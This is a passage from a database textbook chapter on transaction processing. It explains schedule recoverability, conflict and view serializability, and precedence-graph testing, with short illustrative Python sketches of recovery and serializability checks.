concurrency control subsystem of the DBMS. If every transaction does not make its updates (write operations) visible to other transactions until it is committed, one form of isolation is enforced that solves the temporary update problem and eliminates cascading rollbacks but does not elimi- nate all other problems. There have been attempts to define the level of isolation of a transaction. A transaction is said to have level 0 (zero) isolation if it does not over- write the dirty reads of higher-level transactions. Level 1 (one) isolation has no lost updates, and level 2 isolation has no lost updates and no dirty reads. Finally, level 3 isolation (also called true isolation) has, in addition to level 2 properties, repeatable reads.7 And last, the durability property is the responsibility of the recovery subsystem of the DBMS. 
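To make the role of the system log concrete, the following sketch (in Python, with an invented in-memory representation that is not taken from any particular DBMS) shows how log records of the form described in Section 2.2 can be traced backward to undo the write operations of transactions that never reached their commit point.

```python
# A minimal, illustrative sketch, not a real DBMS component: log records are
# tuples mirroring the entry types of Section 2.2, and the database is a dict.
def undo_uncommitted(log, database):
    """Roll back every transaction that appears in the log without a commit
    record, by restoring old_values while tracing backward through the log."""
    committed = {rec[1] for rec in log if rec[0] == 'commit'}
    for rec in reversed(log):
        if rec[0] == 'write_item' and rec[1] not in committed:
            _, txn, item, old_value, _new_value = rec
            database[item] = old_value        # restore the before image of the item
    return database

# Example: T1 has committed, T2 has not; on recovery T2's write of Y is undone.
log = [
    ('start_transaction', 'T1'),
    ('write_item', 'T1', 'X', 20, 15),
    ('commit', 'T1'),
    ('start_transaction', 'T2'),
    ('write_item', 'T2', 'Y', 50, 80),
]
print(undo_uncommitted(log, {'X': 15, 'Y': 80}))  # -> {'X': 15, 'Y': 50}
```

A real recovery subsystem must also handle redo, checkpoints, and force-writing of the log buffer, which this sketch deliberately ignores.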
We will introduce how recovery protocols enforce durability and atomicity in the next section. 4 Characterizing Schedules Based on Recoverability When transactions are executing concurrently in an interleaved fashion, then the order of execution of operations from all the various transactions is known as a schedule (or history). In this section, first we define the concept of schedules, and 7The SQL syntax for isolation level discussed later in Section 6 is closely related to these levels. 759 Introduction to Transaction Processing Concepts and Theory then we characterize the types of schedules that facilitate recovery when failures occur. In Section 5, we characterize schedules in terms of the interference of partic- ipating transactions, leading to the concepts of serializability and serializable sched- ules. 4.1 Schedules (Histories) of Transactions A schedule (or history) S of n transactions T1, T2, ..., Tn is an ordering of the oper- ations of the transactions. Operations from different transactions can be interleaved in the schedule S. However, for each transaction Ti that participates in the schedule S, the operations of Ti in S must appear in the same order in which they occur in Ti. The order of operations in S is considered to be a total ordering, meaning that for any two operations in the schedule, one must occur before the other. It is possible theoretically to deal with schedules whose operations form partial orders (as we discuss later), but we will assume for now total ordering of the operations in a schedule. For the purpose of recovery and concurrency control, we are mainly interested in the read_item and write_item operations of the transactions, as well as the commit and abort operations. A shorthand notation for describing a schedule uses the symbols b, r, w, e, c, and a for the operations begin_transaction, read_item, write_item, end_transac- tion, commit, and abort, respectively, and appends as a subscript the transaction id (transaction number) to each operation in the schedule. In this notation, the data- base item X that is read or written follows the r and w operations in parentheses. In some schedules, we will only show the read and write operations, whereas in other schedules, we will show all the operations. For example, the schedule in Figure 3(a), which we shall call Sa, can be written as follows in this notation: Sa: r1(X); r2(X); w1(X); r1(Y); w2(X); w1(Y); Similarly, the schedule for Figure 3(b), which we call Sb, can be written as follows, if we assume that transaction T1 aborted after its read_item(Y) operation: Sb: r1(X); w1(X); r2(X); w2(X); r1(Y); a1; Two operations in a schedule are said to conflict if they satisfy all three of the fol- lowing conditions: (1) they belong to different transactions; (2) they access the same item X; and (3) at least one of the operations is a write_item(X). For example, in schedule Sa, the operations r1(X) and w2(X) conflict, as do the operations r2(X) and w1(X), and the operations w1(X) and w2(X). However, the operations r1(X) and r2(X) do not conflict, since they are both read operations; the operations w2(X) and w1(Y) do not conflict because they operate on distinct data items X and Y; and the operations r1(X) and w1(X) do not conflict because they belong to the same transaction. Intuitively, two operations are conflicting if changing their order can result in a dif- ferent outcome. 
For example, if we change the order of the two operations r1(X); w2(X) to w2(X); r1(X), then the value of X that is read by transaction T1 changes, because in the second order the value of X is changed by w2(X) before it is read by 760 Introduction to Transaction Processing Concepts and Theory r1(X), whereas in the first order the value is read before it is changed. This is called a read-write conflict. The other type is called a write-write conflict, and is illustrated by the case where we change the order of two operations such as w1(X); w2(X) to w2(X); w1(X). For a write-write conflict, the last value of X will differ because in one case it is written by T2 and in the other case by T1. Notice that two read operations are not conflicting because changing their order makes no difference in outcome. The rest of this section covers some theoretical definitions concerning schedules. A schedule S of n transactions T1, T2, ..., Tn is said to be a complete schedule if the following conditions hold: 1. The operations in S are exactly those operations in T1, T2, ..., Tn, including a commit or abort operation as the last operation for each transaction in the schedule. 2. For any pair of operations from the same transaction Ti, their relative order of appearance in S is the same as their order of appearance in Ti. 3. For any two conflicting operations, one of the two must occur before the other in the schedule.8 The preceding condition (3) allows for two nonconflicting operations to occur in the schedule without defining which occurs first, thus leading to the definition of a schedule as a partial order of the operations in the n transactions.9 However, a total order must be specified in the schedule for any pair of conflicting operations (con- dition 3) and for any pair of operations from the same transaction (condition 2). Condition 1 simply states that all operations in the transactions must appear in the complete schedule. Since every transaction has either committed or aborted, a com- plete schedule will not contain any active transactions at the end of the schedule. In general, it is difficult to encounter complete schedules in a transaction processing system because new transactions are continually being submitted to the system. Hence, it is useful to define the concept of the committed projection C(S) of a schedule S, which includes only the operations in S that belong to committed trans- actions—that is, transactions Ti whose commit operation ci is in S. 4.2 Characterizing Schedules Based on Recoverability For some schedules it is easy to recover from transaction and system failures, whereas for other schedules the recovery process can be quite involved. In some cases, it is even not possible to recover correctly after a failure. Hence, it is important to characterize the types of schedules for which recovery is possible, as well as those for which recovery is relatively simple. These characterizations do not actually pro- vide the recovery algorithm; they only attempt to theoretically characterize the dif- ferent types of schedules. 8Theoretically, it is not necessary to determine an order between pairs of nonconflicting operations. 9In practice, most schedules have a total order of operations. If parallel processing is employed, it is theo- retically possible to have schedules with partially ordered nonconflicting operations. 
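Because the rest of this section leans on the notions of conflicting operations and of the committed projection C(S), a small illustrative sketch may help. The list-of-triples encoding of a schedule used below is an assumption made for illustration only; it is not notation from the text.

```python
# Illustrative sketch only: a schedule is assumed to be a list of triples
# (op, txn, item), with item set to None for commit ('c') and abort ('a'),
# e.g. Sa = [('r', 1, 'X'), ('r', 2, 'X'), ('w', 1, 'X'),
#            ('r', 1, 'Y'), ('w', 2, 'X'), ('w', 1, 'Y')]
def conflict(op1, op2):
    """Two operations conflict if they belong to different transactions,
    access the same database item, and at least one of them is a write."""
    (a, t1, x1), (b, t2, x2) = op1, op2
    return t1 != t2 and x1 is not None and x1 == x2 and 'w' in (a, b)

def committed_projection(schedule):
    """C(S): only the operations of transactions whose commit appears in S."""
    committed = {t for (op, t, _) in schedule if op == 'c'}
    return [entry for entry in schedule if entry[1] in committed]
```

For instance, conflict(('r', 1, 'X'), ('w', 2, 'X')) is True, while conflict(('r', 1, 'X'), ('r', 2, 'X')) is False, matching the examples given above for schedule Sa.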
First, we would like to ensure that, once a transaction T is committed, it should never be necessary to roll back T. This ensures that the durability property of transactions is not violated (see Section 3). The schedules that theoretically meet this criterion are called recoverable schedules; those that do not are called nonrecoverable and hence should not be permitted by the DBMS. The definition of recoverable schedule is as follows: A schedule S is recoverable if no transaction T in S commits until all transactions T′ that have written some item X that T reads have committed. A transaction T reads from transaction T′ in a schedule S if some item X is first written by T′ and later read by T. In addition, T′ should not have been aborted before T reads item X, and there should be no transactions that write X after T′ writes it and before T reads it (unless those transactions, if any, have aborted before T reads X). Some recoverable schedules may require a complex recovery process as we shall see, but if sufficient information is kept (in the log), a recovery algorithm can be devised for any recoverable schedule. The (partial) schedules Sa and Sb from the preceding section are both recoverable, since they satisfy the above definition. Consider the schedule Sa′ given below, which is the same as schedule Sa except that two commit operations have been added to Sa:

Sa′: r1(X); r2(X); w1(X); r1(Y); w2(X); c2; w1(Y); c1;

Sa′ is recoverable, even though it suffers from the lost update problem; this problem is handled by serializability theory (see Section 5). However, consider the two (partial) schedules Sc and Sd that follow:

Sc: r1(X); w1(X); r2(X); r1(Y); w2(X); c2; a1;
Sd: r1(X); w1(X); r2(X); r1(Y); w2(X); w1(Y); c1; c2;
Se: r1(X); w1(X); r2(X); r1(Y); w2(X); w1(Y); a1; a2;

Sc is not recoverable because T2 reads item X from T1, but T2 commits before T1 commits. If T1 aborts after the c2 operation in Sc, the value of X that T2 read is no longer valid, and T2 would have to be aborted after it has already committed, leading to a schedule that is not recoverable. For the schedule to be recoverable, the c2 operation in Sc must be postponed until after T1 commits, as shown in Sd. If T1 aborts instead of committing, then T2 should also abort as shown in Se, because the value of X it read is no longer valid. In Se, aborting T2 is acceptable since it has not committed yet, which is not the case for the nonrecoverable schedule Sc. In a recoverable schedule, no committed transaction ever needs to be rolled back, and so the definition of a committed transaction as durable is not violated. However, it is possible for a phenomenon known as cascading rollback (or cascading abort) to occur in some recoverable schedules, where an uncommitted transaction has to be rolled back because it read an item from a transaction that failed. This is illustrated in schedule Se, where transaction T2 has to be rolled back because it read item X from T1, and T1 then aborted. Because cascading rollback can be quite time-consuming—since numerous transactions can be rolled back—it is important to characterize the schedules where this phenomenon is guaranteed not to occur. A schedule is said to be cascadeless, or to avoid cascading rollback, if every transaction in the schedule reads only items that were written by committed transactions.
In this case, all items read will not be dis- carded, so no cascading rollback will occur. To satisfy this criterion, the r2(X) com- mand in schedules Sd and Se must be postponed until after T1 has committed (or aborted), thus delaying T2 but ensuring no cascading rollback if T1 aborts. Finally, there is a third, more restrictive type of schedule, called a strict schedule, in which transactions can neither read nor write an item X until the last transaction that wrote X has committed (or aborted). Strict schedules simplify the recovery process. In a strict schedule, the process of undoing a write_item(X) operation of an aborted transaction is simply to restore the before image (old_value or BFIM) of data item X. This simple procedure always works correctly for strict schedules, but it may not work for recoverable or cascadeless schedules. For example, consider schedule Sf : Sf : w1(X, 5); w2(X, 8); a1; Suppose that the value of X was originally 9, which is the before image stored in the system log along with the w1(X, 5) operation. If T1 aborts, as in Sf , the recovery pro- cedure that restores the before image of an aborted write operation will restore the value of X to 9, even though it has already been changed to 8 by transaction T2, thus leading to potentially incorrect results. Although schedule Sf is cascadeless, it is not a strict schedule, since it permits T2 to write item X even though the transaction T1 that last wrote X had not yet committed (or aborted). A strict schedule does not have this problem. It is important to note that any strict schedule is also cascadeless, and any cascade- less schedule is also recoverable. Suppose we have i transactions T1, T2, ..., Ti, and their number of operations are n1, n2, ..., ni, respectively. If we make a set of all pos- sible schedules of these transactions, we can divide the schedules into two disjoint subsets: recoverable and nonrecoverable. The cascadeless schedules will be a subset of the recoverable schedules, and the strict schedules will be a subset of the cascade- less schedules. Thus, all strict schedules are cascadeless, and all cascadeless schedules are recoverable. 5 Characterizing Schedules Based on Serializability In the previous section, we characterized schedules based on their recoverability properties. Now we characterize the types of schedules that are always considered to be correct when concurrent transactions are executing. Such schedules are known as serializable schedules. Suppose that two users—for example, two airline reservations agents—submit to the DBMS transactions T1 and T2 in Figure 2 at approximately the same time. If no interleaving of operations is permitted, there are only two pos- sible outcomes: 1. Execute all the operations of transaction T1 (in sequence) followed by all the operations of transaction T2 (in sequence). 
2. Execute all the operations of transaction T2 (in sequence) followed by all the operations of transaction T1 (in sequence).

Figure 5 Examples of serial and nonserial schedules involving transactions T1 and T2. (a) Serial schedule A: T1 followed by T2. (b) Serial schedule B: T2 followed by T1. (c) Two nonserial schedules C and D with interleaving of operations.

These two schedules—called serial schedules—are shown in Figure 5(a) and (b), respectively. If interleaving of operations is allowed, there will be many possible orders in which the system can execute the individual operations of the transactions. Two possible schedules are shown in Figure 5(c). The concept of serializability of schedules is used to identify which schedules are correct when transaction executions have interleaving of their operations in the schedules. This section defines serializability and discusses how it may be used in practice.

5.1 Serial, Nonserial, and Conflict-Serializable Schedules

Schedules A and B in Figure 5(a) and (b) are called serial because the operations of each transaction are executed consecutively, without any interleaved operations from the other transaction. In a serial schedule, entire transactions are performed in serial order: T1 and then T2 in Figure 5(a), and T2 and then T1 in Figure 5(b). Schedules C and D in Figure 5(c) are called nonserial because each sequence interleaves operations from the two transactions. Formally, a schedule S is serial if, for every transaction T participating in the schedule, all the operations of T are executed consecutively in the schedule; otherwise, the schedule is called nonserial. Therefore, in a serial schedule, only one transaction at a time is active—the commit (or abort) of the active transaction initiates execution of the next transaction. No interleaving occurs in a serial schedule. One reasonable assumption we can make, if we consider the transactions to be independent, is that every serial schedule is considered correct. We can assume this because every transaction is assumed to be correct if executed on its own (according to the consistency preservation property of Section 3). Hence, it does not matter which transaction is executed first. As long as every transaction is executed from beginning to end in isolation from the operations of other transactions, we get a correct end result on the database. The problem with serial schedules is that they limit concurrency by prohibiting interleaving of operations. In a serial schedule, if a transaction waits for an I/O operation to complete, we cannot switch the CPU processor to another transaction, thus wasting valuable CPU processing time.
Additionally, if some transaction T is quite long, the other transactions must wait for T to complete all its operations before starting. Hence, serial schedules are considered unacceptable in practice. However, if we can determine which other schedules are equivalent to a serial schedule, we can allow these schedules to occur. To illustrate our discussion, consider the schedules in Figure 5, and assume that the initial values of database items are X = 90 and Y = 90 and that N = 3 and M = 2. After executing transactions T1 and T2, we would expect the database values to be X = 89 and Y = 93, according to the meaning of the transactions. Sure enough, executing either of the serial schedules A or B gives the correct results. Now consider the nonserial schedules C and D. Schedule C (which is the same as Figure 3(a)) gives the results X = 92 and Y = 93, in which the X value is erroneous, whereas schedule D gives the correct results. Schedule C gives an erroneous result because of the lost update problem discussed in Section 1.3; transaction T2 reads the value of X before it is changed by transaction T1, so only the effect of T2 on X is reflected in the database. The effect of T1 on X is lost, overwritten by T2, leading to the incorrect result for item X. However, some nonserial schedules give the correct expected result, such as schedule D. We would like to determine which of the nonserial schedules always give a correct result and which may give erroneous results. The concept used to characterize schedules in this manner is that of serializability of a schedule.

Figure 6 Two schedules that are result equivalent for the initial value of X = 100 but are not result equivalent in general. S1: read_item(X); X := X + 10; write_item(X). S2: read_item(X); X := X * 1.1; write_item(X).

The definition of serializable schedule is as follows: A schedule S of n transactions is serializable if it is equivalent to some serial schedule of the same n transactions. We will define the concept of equivalence of schedules shortly. Notice that there are n! possible serial schedules of n transactions and many more possible nonserial schedules. We can form two disjoint groups of the nonserial schedules—those that are equivalent to one (or more) of the serial schedules and hence are serializable, and those that are not equivalent to any serial schedule and hence are not serializable. Saying that a nonserial schedule S is serializable is equivalent to saying that it is correct, because it is equivalent to a serial schedule, which is considered correct. The remaining question is: When are two schedules considered equivalent? There are several ways to define schedule equivalence. The simplest but least satisfactory definition involves comparing the effects of the schedules on the database. Two schedules are called result equivalent if they produce the same final state of the database. However, two different schedules may accidentally produce the same final state. For example, in Figure 6, schedules S1 and S2 will produce the same final database state if they execute on a database with an initial value of X = 100; however, for other initial values of X, the schedules are not result equivalent. Additionally, these schedules execute different transactions, so they definitely should not be considered equivalent. Hence, result equivalence alone cannot be used to define equivalence of schedules.
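The weakness of result equivalence is easy to see computationally; the following throwaway sketch simply checks the two single-transaction schedules of Figure 6 over several initial values of X.

```python
# Figure 6 reduced to two functions of X (X * 1.1 is written as X * 11 / 10
# here only to avoid floating-point noise in the comparison).
s1 = lambda x: x + 10        # S1: read_item(X); X := X + 10;  write_item(X)
s2 = lambda x: x * 11 / 10   # S2: read_item(X); X := X * 1.1; write_item(X)

for x in (50, 100, 200):
    print(x, s1(x), s2(x), s1(x) == s2(x))
# Only the initial value X = 100 yields the same final state (110), so the two
# schedules are result equivalent for that value but not in general.
```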
The safest and most general approach to defining schedule equivalence is not to make any assumptions about the types of operations included in the transactions. For two schedules to be equivalent, the operations applied to each data item affected by the schedules should be applied to that item in both schedules in the same order. Two definitions of equivalence of schedules are generally used: conflict equivalence and view equivalence. We discuss conflict equivalence next, which is the more commonly used definition. The definition of conflict equivalence of schedules is as follows: Two schedules are said to be conflict equivalent if the order of any two conflicting operations is the same in both schedules. Recall from Section 4.1 that two operations in a schedule are said to conflict if they belong to different transactions, access the same database item, and either both are write_item operations or one is a write_item and the other a read_item. If two conflicting operations are applied in different orders in two schedules, the effect can be different on the database or on the transactions in the schedule, and hence the schedules are not conflict equivalent. For example, as we discussed in Section 4.1, if a read and write operation occur in the order r1(X), w2(X) in schedule S1, and in the reverse order w2(X), r1(X) in schedule S2, the value read by r1(X) can be different in the two schedules. Similarly, if two write operations occur in the order w1(X), w2(X) in S1, and in the reverse order w2(X), w1(X) in S2, the next r(X) operation in the two schedules will read potentially different values; or if these are the last operations writing item X in the schedules, the final value of item X in the database will be different. Using the notion of conflict equivalence, we define a schedule S to be conflict serializable10 if it is (conflict) equivalent to some serial schedule S′. In such a case, we can reorder the nonconflicting operations in S until we form the equivalent serial schedule S′. According to this definition, schedule D in Figure 5(c) is equivalent to the serial schedule A in Figure 5(a). In both schedules, the read_item(X) of T2 reads the value of X written by T1, while the other read_item operations read the database values from the initial database state. Additionally, T1 is the last transaction to write Y, and T2 is the last transaction to write X in both schedules. Because A is a serial schedule and schedule D is equivalent to A, D is a serializable schedule. Notice that the operations r1(Y) and w1(Y) of schedule D do not conflict with the operations r2(X) and w2(X), since they access different data items. Therefore, we can move r1(Y), w1(Y) before r2(X), w2(X), leading to the equivalent serial schedule T1, T2. Schedule C in Figure 5(c) is not equivalent to either of the two possible serial schedules A and B, and hence is not serializable. Trying to reorder the operations of schedule C to find an equivalent serial schedule fails because r2(X) and w1(X) conflict, which means that we cannot move r2(X) down to get the equivalent serial schedule T1, T2. Similarly, because w1(X) and w2(X) conflict, we cannot move w1(X) down to get the equivalent serial schedule T2, T1. Another, more complex definition of equivalence—called view equivalence, which leads to the concept of view serializability—is discussed in Section 5.4.

10 We will use serializable to mean conflict serializable. Another definition of serializable used in practice (see Section 6) is to have repeatable reads, no dirty reads, and no phantom records.
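Under the same illustrative triple encoding assumed earlier, conflict equivalence can be checked directly from its definition by comparing the relative order of every conflicting pair of operations; this is a sketch, not an optimized algorithm, and it assumes the schedules are listed as read/write triples only.

```python
def conflicting_pairs(schedule):
    """Ordered pairs (earlier, later) of conflicting read/write operations,
    using the (op, txn, item) triples assumed in the earlier sketches."""
    pairs = set()
    for i, a in enumerate(schedule):
        for b in schedule[i + 1:]:
            if a[1] != b[1] and a[2] == b[2] and 'w' in (a[0], b[0]):
                pairs.add((a, b))
    return pairs

def conflict_equivalent(s1, s2):
    """Same read/write operations, and every conflicting pair ordered the same way."""
    return sorted(s1) == sorted(s2) and conflicting_pairs(s1) == conflicting_pairs(s2)

# Schedule D is conflict equivalent to serial schedule A; schedule C is not.
A = [('r',1,'X'), ('w',1,'X'), ('r',1,'Y'), ('w',1,'Y'), ('r',2,'X'), ('w',2,'X')]
D = [('r',1,'X'), ('w',1,'X'), ('r',2,'X'), ('w',2,'X'), ('r',1,'Y'), ('w',1,'Y')]
C = [('r',1,'X'), ('r',2,'X'), ('w',1,'X'), ('r',1,'Y'), ('w',2,'X'), ('w',1,'Y')]
print(conflict_equivalent(D, A), conflict_equivalent(C, A))  # -> True False
```

The outcome matches the discussion above: every conflicting pair involving item X is ordered T1 before T2 in both A and D, whereas in C the pair r2(X), w1(X) is ordered the other way.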
5.2 Testing for Conflict Serializability of a Schedule

There is a simple algorithm for determining whether a particular schedule is conflict serializable or not. Most concurrency control methods do not actually test for serializability. Rather, protocols, or rules, are developed that guarantee that any schedule that follows these rules will be serializable. We discuss the algorithm for testing conflict serializability of schedules here to gain a better understanding of these concurrency control protocols. Algorithm 1 can be used to test a schedule for conflict serializability. The algorithm looks at only the read_item and write_item operations in a schedule to construct a precedence graph (or serialization graph), which is a directed graph G = (N, E) that consists of a set of nodes N = {T1, T2, ..., Tn} and a set of directed edges E = {e1, e2, ..., em}. There is one node in the graph for each transaction Ti in the schedule. Each edge ei in the graph is of the form (Tj → Tk), 1 ≤ j ≤ n, 1 ≤ k ≤ n, where Tj is the starting node of ei and Tk is the ending node of ei. Such an edge from node Tj to node Tk is created by the algorithm if one of the operations in Tj appears in the schedule before some conflicting operation in Tk.

Algorithm 1. Testing Conflict Serializability of a Schedule S
1. For each transaction Ti participating in schedule S, create a node labeled Ti in the precedence graph.
2. For each case in S where Tj executes a read_item(X) after Ti executes a write_item(X), create an edge (Ti → Tj) in the precedence graph.
3. For each case in S where Tj executes a write_item(X) after Ti executes a read_item(X), create an edge (Ti → Tj) in the precedence graph.
4. For each case in S where Tj executes a write_item(X) after Ti executes a write_item(X), create an edge (Ti → Tj) in the precedence graph.
5. The schedule S is serializable if and only if the precedence graph has no cycles.

The precedence graph is constructed as described in Algorithm 1. If there is a cycle in the precedence graph, schedule S is not (conflict) serializable; if there is no cycle, S is serializable. A cycle in a directed graph is a sequence of edges C = ((Tj → Tk), (Tk → Tp), ..., (Ti → Tj)) with the property that the starting node of each edge—except the first edge—is the same as the ending node of the previous edge, and the starting node of the first edge is the same as the ending node of the last edge (the sequence starts and ends at the same node). In the precedence graph, an edge from Ti to Tj means that transaction Ti must come before transaction Tj in any serial schedule that is equivalent to S, because two conflicting operations appear in the schedule in that order. If there is no cycle in the precedence graph, we can create a serial schedule S′ that is equivalent to S by ordering the transactions that participate in S as follows: whenever an edge exists in the precedence graph from Ti to Tj, Ti must appear before Tj in the equivalent serial schedule S′.11 Notice that the edges (Ti → Tj) in a precedence graph can optionally be labeled by the name(s) of the data item(s) that led to creating the edge. Figure 7 shows such labels on the edges.

11 This process of ordering the nodes of an acyclic graph is known as topological sorting.
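Algorithm 1 is short enough to sketch directly in code. The following illustrative Python version (again using the assumed list-of-triples encoding of a schedule, which is not notation from the text) builds the precedence graph and reports whether it is acyclic, returning one equivalent serial order when it is.

```python
from collections import defaultdict

def precedence_graph(schedule):
    """Steps 1-4 of Algorithm 1: one node per transaction, and an edge
    Ti -> Tj whenever an operation of Ti precedes a conflicting operation
    of Tj. The schedule is a list of (op, txn, item) triples."""
    txns = {t for _, t, _ in schedule}
    edges = defaultdict(set)
    for i, (op1, t1, x1) in enumerate(schedule):
        for op2, t2, x2 in schedule[i + 1:]:
            if t1 != t2 and x1 == x2 and 'w' in (op1, op2):   # conflicting pair
                edges[t1].add(t2)
    return txns, edges

def is_conflict_serializable(schedule):
    """Step 5: serializable iff the precedence graph has no cycle. If it is
    acyclic, also return one equivalent serial order (a topological sort)."""
    txns, edges = precedence_graph(schedule)
    in_degree = {t: 0 for t in txns}
    for t in edges:
        for u in edges[t]:
            in_degree[u] += 1
    order = []
    ready = [t for t in txns if in_degree[t] == 0]
    while ready:
        t = ready.pop()
        order.append(t)
        for u in edges[t]:
            in_degree[u] -= 1
            if in_degree[u] == 0:
                ready.append(u)
    acyclic = len(order) == len(txns)        # every node ordered => no cycle
    return acyclic, (order if acyclic else None)

C = [('r',1,'X'), ('r',2,'X'), ('w',1,'X'), ('r',1,'Y'), ('w',2,'X'), ('w',1,'Y')]
D = [('r',1,'X'), ('w',1,'X'), ('r',2,'X'), ('w',2,'X'), ('r',1,'Y'), ('w',1,'Y')]
print(is_conflict_serializable(C))   # -> (False, None)
print(is_conflict_serializable(D))   # -> (True, [1, 2])
```

The results agree with Figure 7: schedule C's graph contains the cycle T1 → T2 → T1 over item X, while schedule D's graph is acyclic and topological sorting yields the serial order T1, T2 (schedule A).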
In general, several serial schedules can be equivalent to S if the precedence graph for S has no cycle. However, if the precedence graph has a cycle, it is easy to show that we cannot create any equivalent serial schedule, so S is not serializable. The precedence graphs created for schedules A to D, respectively, in Figure 5 appear in Figure 7(a) to (d). The graph for schedule C has a cycle, so it is not serializable. The graph for schedule D has no cycle, so it is serializable, and the equivalent serial schedule is T1 followed by T2. The graphs for schedules A and B have no cycles, as expected, because the schedules are serial and hence serializable.

Figure 7 Constructing the precedence graphs for schedules A to D from Figure 5 to test for conflict serializability. (a) Precedence graph for serial schedule A. (b) Precedence graph for serial schedule B. (c) Precedence graph for schedule C (not serializable). (d) Precedence graph for schedule D (serializable, equivalent to schedule A).

Another example, in which three transactions participate, is shown in Figure 8. Figure 8(a) shows the read_item and write_item operations in each transaction. Two schedules E and F for these transactions are shown in Figure 8(b) and (c), respectively, and the precedence graphs for schedules E and F are shown in parts (d) and (e). Schedule E is not serializable because the corresponding precedence graph has cycles. Schedule F is serializable, and the serial schedule equivalent to F is shown in Figure 8(e). Although only one equivalent serial schedule exists for F, in general there may be more than one equivalent serial schedule for a serializable schedule. Figure 8(f) shows a precedence graph representing a schedule that has two equivalent serial schedules. To find an equivalent serial schedule, start with a node that does not have any incoming edges, and then make sure that the node order for every edge is not violated.

5.3 How Serializability Is Used for Concurrency Control

As we discussed earlier, saying that a schedule S is (conflict) serializable—that is, S is (conflict) equivalent to a serial schedule—is tantamount to saying that S is correct. Being serializable is distinct from being serial, however. A serial schedule represents inefficient processing because no interleaving of operations from different transactions is permitted. This can lead to low CPU utilization while a transaction waits for disk I/O, or for another transaction to terminate, thus slowing down processing considerably. A serializable schedule gives the benefits of concurrent execution without giving up any correctness. In practice, it is quite difficult to test for the serializability of a schedule.
The interleaving of operations from concurrent transactions—which are usually executed as processes by the operating system—is typically determined by the operating system scheduler, which allocates resources to all processes. Factors such as system load, time of transaction submission, and priorities of processes contribute to the ordering of operations in a schedule. Hence, it is difficult to determine how the operations of a schedule will be interleaved beforehand to ensure serializability.

Figure 8 Another example of serializability testing. (a) The read and write operations of three transactions: T1: r(X); w(X); r(Y); w(Y); T2: r(Z); r(Y); w(Y); r(X); w(X); T3: r(Y); r(Z); w(Y); w(Z). (b) Schedule E. (c) Schedule F. (d) Precedence graph for schedule E (cycles X(T1 → T2), Y(T2 → T1) and X(T1 → T2), YZ(T2 → T3), Y(T3 → T1); no equivalent serial schedule). (e) Precedence graph for schedule F. (f) Precedence graph with two equivalent serial schedules.

If transactions are executed at will and then the resulting schedule is tested for serializability, we must cancel the effect of the schedule if it turns out not to be serializable. This is a serious problem that makes this approach impractical. Hence, the approach taken in most practical systems is to determine methods or protocols that ensure serializability, without having to test the schedules themselves. The approach taken in most commercial DBMSs is to design protocols (sets of rules) that—if followed by every individual transaction or if enforced by a DBMS concurrency control subsystem—will ensure serializability of all schedules in which the transactions participate. Another problem appears here: When transactions are submitted continuously to the system, it is difficult to determine when a schedule begins and when it ends. Serializability theory can be adapted to deal with this problem by considering only the committed projection of a schedule S. Recall from Section 4.1 that the committed projection C(S) of a schedule S includes only the operations in S that belong to committed transactions. We can theoretically define a schedule S to be serializable if its committed projection C(S) is equivalent to some serial schedule, since only committed transactions are guaranteed by the DBMS. A number of different concurrency control protocols guarantee serializability.
The most common technique, called two-phase locking, is based on locking data items to prevent concurrent transactions from interfering with one another, and enforcing an additional condition that guarantees serializability. This is used in the majority of commercial DBMSs. Other protocols have been proposed;12 these include timestamp ordering, where each transaction is assigned a unique timestamp and the protocol ensures that any conflicting operations are executed in the order of the transaction timestamps; multiversion protocols, which are based on maintaining multiple versions of data items; and optimistic (also called certification or validation) protocols, which check for possible serializability violations after the transactions terminate but before they are permitted to commit.

12 These other protocols have not been incorporated much into commercial systems; most relational DBMSs use some variation of the two-phase locking protocol.

5.4 View Equivalence and View Serializability

In Section 5.1 we defined the concepts of conflict equivalence of schedules and conflict serializability. Another less restrictive definition of equivalence of schedules is called view equivalence. This leads to another definition of serializability called view serializability. Two schedules S and S′ are said to be view equivalent if the following three conditions hold:

1. The same set of transactions participates in S and S′, and S and S′ include the same operations of those transactions.
2. For any operation ri(X) of Ti in S, if the value of X read by the operation has been written by an operation wj(X) of Tj (or if it is the original value of X before the schedule started), the same condition must hold for the value of X read by operation ri(X) of Ti in S′.
3. If the operation wk(Y) of Tk is the last operation to write item Y in S, then wk(Y) of Tk must also be the last operation to write item Y in S′.

The idea behind view equivalence is that, as long as each read operation of a transaction reads the result of the same write operation in both schedules, the write operations of each transaction must produce the same results. The read operations are hence said to see the same view in both schedules. Condition 3 ensures that the final write operation on each data item is the same in both schedules, so the database state should be the same at the end of both schedules. A schedule S is said to be view serializable if it is view equivalent to a serial schedule. The definitions of conflict serializability and view serializability are similar if a condition known as the constrained write assumption (or no blind writes) holds on all transactions in the schedule. This condition states that any write operation wi(X) in Ti is preceded by a ri(X) in Ti and that the value written by wi(X) in Ti depends only on the value of X read by ri(X). This assumes that computation of the new value of X is a function f(X) based on the old value of X read from the database. A blind write is a write operation in a transaction T on an item X that is not dependent on the value of X, so it is not preceded by a read of X in the transaction T. The definition of view serializability is less restrictive than that of conflict serializability under the unconstrained write assumption, where the value written by an operation wi(X) in Ti can be independent of its old value from the database.
This is possible when blind writes are allowed, and it is illustrated by the following schedule Sg of three transactions T1: r1(X); w1(X); T2: w2(X); and T3: w3(X): Sg: r1(X); w2(X); w1(X); w3(X); c1; c2; c3; In Sg the operations w2(X) and w3(X) are blind writes, since T2 and T3 do not read the value of X. The schedule Sg is view serializable, since it is view equivalent to the serial schedule T1, T2, T3. However, Sg is not conflict serializable, since it is not conflict equivalent to any serial schedule. It has been shown that any conflict- serializable schedule is also view serializable but not vice versa, as illustrated by the preceding example. There is an algorithm to test whether a schedule S is view serial- izable or not. However, the problem of testing for view serializability has been shown to be NP-hard, meaning that finding an efficient polynomial time algorithm for this problem is highly unlikely. 5.5 Other Types of Equivalence of Schedules Serializability of schedules is sometimes considered to be too restrictive as a condi- tion for ensuring the correctness of concurrent executions. Some applications can produce schedules that are correct by satisfying conditions less stringent than either conflict serializability or view serializability. An example is the type of transactions known as debit-credit transactions—for example, those that apply deposits and withdrawals to a data item whose value is the current balance of a bank account. The semantics of debit-credit operations is that they update the value of a data item X by either subtracting from or adding to the value of the data item. Because addi- tion and subtraction operations are commutative—that is, they can be applied in any order—it is possible to produce correct schedules that are not serializable. For example, consider the following transactions, each of which may be used to transfer an amount of money between two bank accounts: T1: r1(X); X := X − 10; w1(X); r1(Y); Y := Y + 10; w1(Y); T2: r2(Y); Y := Y − 20; w2(Y); r2(X); X := X + 20; w2(X); Consider the following nonserializable schedule Sh for the two transactions: Sh: r1(X); w1(X); r2(Y); w2(Y); r1(Y); 